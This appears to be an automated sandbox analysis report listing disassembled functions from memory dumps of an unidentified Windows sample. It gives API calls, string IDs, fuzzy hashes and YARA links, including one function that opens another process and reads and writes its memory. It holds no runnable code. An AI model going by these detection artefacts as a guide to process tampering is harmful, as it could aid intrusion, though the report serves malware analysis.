                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateInitializeInstanceUninitialize
                                                                                                                  • String ID: .lnk
                                                                                                                  • API String ID: 948891078-24824748
                                                                                                                  • Opcode ID: e6aee58e282bf27c4ec336307c59119536eb5a18fa0174f596c39caace6ab736
                                                                                                                  • Instruction ID: dee0397fa71b85db7d2a55e4f655d46f810f401150262d70e2215b10fee0343e
                                                                                                                  • Opcode Fuzzy Hash: e6aee58e282bf27c4ec336307c59119536eb5a18fa0174f596c39caace6ab736
                                                                                                                  • Instruction Fuzzy Hash: B7A12A71104245AFD300EF64DC91DABB7E8EF98714F40491DF69597192EBB0EA09CBB2
                                                                                                                  Function 00E2E7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DE660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DE53B1,?,?,00DE61FF,?,00000000,00000001,00000000), ref: 00DE662F
                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00E2E85D
                                                                                                                  • CoCreateInstance.COMBASE(00E6DA7C,00000000,00000001,00E6D8EC,?), ref: 00E2E876
                                                                                                                  • CoUninitialize.COMBASE ref: 00E2E893
                                                                                                                    • Part of subcall function 00DE936C: __swprintf.LIBCMT ref: 00DE93AB
                                                                                                                    • Part of subcall function 00DE936C: __itow.LIBCMT ref: 00DE93DF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                  • String ID: .lnk
                                                                                                                  • API String ID: 2126378814-24824748
                                                                                                                  • Opcode ID: 65bf8726d3cc9b2b86988ce31b0e0af13c9eba0b7b92fea1ff68821d109484bc
                                                                                                                  • Instruction ID: c53b3bce4363f9ce4dbe464cdc4d4d69527e0b6f4b88506fffefa23aaa7a20c8
                                                                                                                  • Opcode Fuzzy Hash: 65bf8726d3cc9b2b86988ce31b0e0af13c9eba0b7b92fea1ff68821d109484bc
                                                                                                                  • Instruction Fuzzy Hash: EDA159756043219FCB14EF15C88492EB7E5FF88314F148989F995AB3A2CB31EC45CBA1
                                                                                                                  Function 00E0325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 00E032ED
                                                                                                                    • Part of subcall function 00E0E0D0: __87except.LIBCMT ref: 00E0E10B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorHandling__87except__start
                                                                                                                  • String ID: pow
                                                                                                                  • API String ID: 2905807303-2276729525
                                                                                                                  • Opcode ID: 07d4add1f6db812951cceffe5ed235b1c16ef618f576809e2a65191d0c8d3124
                                                                                                                  • Instruction ID: 1772af5cd00d10683fa2ec1998bdee08cf80058991cfa9502789ba572ad9cdf8
                                                                                                                  • Opcode Fuzzy Hash: 07d4add1f6db812951cceffe5ed235b1c16ef618f576809e2a65191d0c8d3124
                                                                                                                  • Instruction Fuzzy Hash: 66515D31A092029ACB15B724C9413BA6BDCDB81714F24BD79F4D5B23F9EF388DC89642
                                                                                                                  Function 00E24606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00E7DC50,?,0000000F,0000000C,00000016,00E7DC50,?), ref: 00E24645
                                                                                                                    • Part of subcall function 00DE936C: __swprintf.LIBCMT ref: 00DE93AB
                                                                                                                    • Part of subcall function 00DE936C: __itow.LIBCMT ref: 00DE93DF
                                                                                                                  • CharUpperBuffW.USER32(?,?,00000000,?), ref: 00E246C5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BuffCharUpper$__itow__swprintf
                                                                                                                  • String ID: REMOVE$THIS
                                                                                                                  • API String ID: 3797816924-776492005
                                                                                                                  • Opcode ID: f05f16aa30521e6d05a71e70eb8fb24da423084c973bd70c766a564991b9f454
                                                                                                                  • Instruction ID: a4f432d02319b9b265e692eb5bf6e020eaa7d46e593dc1bcb36004015359497a
                                                                                                                  • Opcode Fuzzy Hash: f05f16aa30521e6d05a71e70eb8fb24da423084c973bd70c766a564991b9f454
                                                                                                                  • Instruction Fuzzy Hash: A641E7B4A002699FCF01EF65D881AAEB7F5FF49304F14905AE916BB292DB30DD45CB60
                                                                                                                  Function 00E1C189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00E2430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E1BC08,?,?,00000034,00000800,?,00000034), ref: 00E24335
                                                                                                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00E1C1D3
                                                                                                                    • Part of subcall function 00E242D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E1BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00E24300
                                                                                                                    • Part of subcall function 00E2422F: GetWindowThreadProcessId.USER32(?,?), ref: 00E2425A
                                                                                                                    • Part of subcall function 00E2422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00E1BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00E2426A
                                                                                                                    • Part of subcall function 00E2422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00E1BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00E24280
                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E1C240
                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E1C28D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                  • String ID: @
                                                                                                                  • API String ID: 4150878124-2766056989
                                                                                                                  • Opcode ID: 9d43f4f3678fa69ae8737e09fd29d5a84ce8d7443897c6a144bd0a34a1c2b2a6
                                                                                                                  • Instruction ID: 36ec6a33b70ac4313c487c1d57ffa98137e3ce0c74d0ea9dcbb9360cde880dc4
                                                                                                                  • Opcode Fuzzy Hash: 9d43f4f3678fa69ae8737e09fd29d5a84ce8d7443897c6a144bd0a34a1c2b2a6
                                                                                                                  • Instruction Fuzzy Hash: 76414D72900228AFDB11EFA4DC81AEEB7B8FF09700F105095FA55B7191DB716E85CB61
                                                                                                                  Function 00E4A63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00E7DC00,00000000,?,?,?,?), ref: 00E4A6D8
                                                                                                                  • GetWindowLongW.USER32 ref: 00E4A6F5
                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E4A705
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Long
                                                                                                                  • String ID: SysTreeView32
                                                                                                                  • API String ID: 847901565-1698111956
                                                                                                                  • Opcode ID: 0babd111ce670a0b19b4e33241a36c2caedb294d20a44fc3c66259d04ed6fcc2
                                                                                                                  • Instruction ID: ee4ae19aef42363dc74eefcfeb6cade0f97afa7599b9c680af6d423c0ef072c3
                                                                                                                  • Opcode Fuzzy Hash: 0babd111ce670a0b19b4e33241a36c2caedb294d20a44fc3c66259d04ed6fcc2
                                                                                                                  • Instruction Fuzzy Hash: 9B31D231644209AFDB218E38EC45BEA77A9FB49378F195325F975E31E0C770AC509B60
                                                                                                                  Function 00E35180 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00E35190
                                                                                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00E351C6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CrackInternet_memset
                                                                                                                  • String ID: |$D
                                                                                                                  • API String ID: 1413715105-465884809
                                                                                                                  • Opcode ID: b6efa88b2b7bb06a1a8929fc633f3328cb9b1630d1b3de7ccf3e3a176b565206
                                                                                                                  • Instruction ID: 31b247ec10a1d45607b8831ebdc128af926a71ea998cefc4511ac6c78a6c015b
                                                                                                                  • Opcode Fuzzy Hash: b6efa88b2b7bb06a1a8929fc633f3328cb9b1630d1b3de7ccf3e3a176b565206
                                                                                                                  • Instruction Fuzzy Hash: 3F313971C00119ABCF01AFE5CC85AEEBFB9FF19700F001019F905B6266DB31A946CBA4
                                                                                                                  Function 00E4A0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00E4A15E
                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00E4A172
                                                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E4A196
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Window
                                                                                                                  • String ID: SysMonthCal32
                                                                                                                  • API String ID: 2326795674-1439706946
                                                                                                                  • Opcode ID: 249467eab8008189a2b66e4ec292d5933be22749ba01660ebc35bb190ebc6593
                                                                                                                  • Instruction ID: c4f235a552aab6b061dc07cfe90836d49c3b7194c8d101548ef14b16640d6331
                                                                                                                  • Opcode Fuzzy Hash: 249467eab8008189a2b66e4ec292d5933be22749ba01660ebc35bb190ebc6593
                                                                                                                  • Instruction Fuzzy Hash: AF21F172540218ABDF118F94DC42FEA3B7AFF48764F051224FA55BB2D0D6B1AC54CBA0
                                                                                                                  Function 00E4A88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00E4A941
                                                                                                                  • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00E4A94F
                                                                                                                  • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E4A956
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$DestroyWindow
                                                                                                                  • String ID: msctls_updown32
                                                                                                                  • API String ID: 4014797782-2298589950
                                                                                                                  • Opcode ID: c2b38591353a2f727ea64c4ab98f0682531bfbc1536614324905ca7bf0ac0312
                                                                                                                  • Instruction ID: 734ab5aaa0c821984c6f7bd73f0f9f68176771bf36396ce8d5d18b942f4426b4
                                                                                                                  • Opcode Fuzzy Hash: c2b38591353a2f727ea64c4ab98f0682531bfbc1536614324905ca7bf0ac0312
                                                                                                                  • Instruction Fuzzy Hash: A72165B5640209AFDB10DF15EC91D7737ADEB9E3A8B091059FA04A7351CB71EC11CB61
                                                                                                                  Function 00E499A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00E49A30
                                                                                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00E49A40
                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00E49A65
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$MoveWindow
                                                                                                                  • String ID: Listbox
                                                                                                                  • API String ID: 3315199576-2633736733
                                                                                                                  • Opcode ID: cee83ba62fa4ea24efa54aea1cb023ba70c31f8387afc3c8984a542cbfb51868
                                                                                                                  • Instruction ID: 290c2ea7b53dfdde05b7b52bc32c2efa39cf7114369e637304d455b7e8f0bd2a
                                                                                                                  • Opcode Fuzzy Hash: cee83ba62fa4ea24efa54aea1cb023ba70c31f8387afc3c8984a542cbfb51868
                                                                                                                  • Instruction Fuzzy Hash: 1D21C532610118BFDF118F55EC85EBF3BAAEF89764F018128F954B71A1C6719C5197A0
                                                                                                                  Function 00E4A409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00E4A46D
                                                                                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00E4A482
                                                                                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00E4A48F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend
                                                                                                                  • String ID: msctls_trackbar32
                                                                                                                  • API String ID: 3850602802-1010561917
                                                                                                                  • Opcode ID: c787f4e79ab2c24e18f2fe8286f85c5b3550e27cd96716e3f6d5357aa1af413a
                                                                                                                  • Instruction ID: 3aa824c396b265e35f8c97084895f9c0bff17548e2d883682c00452b6083ef3a
                                                                                                                  • Opcode Fuzzy Hash: c787f4e79ab2c24e18f2fe8286f85c5b3550e27cd96716e3f6d5357aa1af413a
                                                                                                                  • Instruction Fuzzy Hash: 1711E771240208BEEF205F65DC49FAB3B69EF89768F054128FA55B60D1D2B2E811C724
                                                                                                                  Function 00E02287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 00E022A1
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00E022A8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: RoInitialize$combase.dll
                                                                                                                  • API String ID: 2574300362-340411864
                                                                                                                  • Opcode ID: 08e0833cce0fa09fe45699ff0b99c7aff0c0ac4f059881a9d77ff6f821d9d8e4
                                                                                                                  • Instruction ID: 9c0608d058ba7819c22c817963e5b8a28544e70e0f3414af6d7ef4e894e5c5c7
                                                                                                                  • Opcode Fuzzy Hash: 08e0833cce0fa09fe45699ff0b99c7aff0c0ac4f059881a9d77ff6f821d9d8e4
                                                                                                                  • Instruction Fuzzy Hash: AEE01A74A99300AFDB905FB3EC4DB5536A9AB1A746F505025F202F50F0CBF55089DF05
                                                                                                                  Function 00E0235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00E02276), ref: 00E02376
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00E0237D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
